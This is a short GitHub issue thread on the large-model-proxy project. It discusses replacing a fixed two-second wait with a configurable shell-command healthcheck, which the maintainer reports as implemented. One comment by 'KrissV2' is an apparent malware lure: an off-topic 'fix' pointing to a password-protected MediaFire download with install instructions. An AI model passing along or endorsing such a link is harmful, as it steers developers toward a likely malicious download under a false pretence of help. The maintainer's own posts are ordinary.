### ISSUE TITLE
Custom healtcheck before connection

### ISSUE THREAD

**Issue by perk11** [perk11/large-model-proxy#8]
Currently, the proxy just waits 2 seconds after starting a service before trying to open connection. This is inefficient, because if connection is accepted and the service is waiting to respond until it's ready, 2 seconds can be too much time. And if it's responding with an error until it loads (llama.cpp started doing this recently), then if it doesn't load in 2 seconds, the connection can fail.

This feature will allow to not start connection until a certain shell command succeeds. This can be used with e.g. curl to monitor an endpoint for 200 status.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by perk11** [comment]
Implemented in a45e1bc5ba03aa7f49ea8f21667c346892f4d6a5
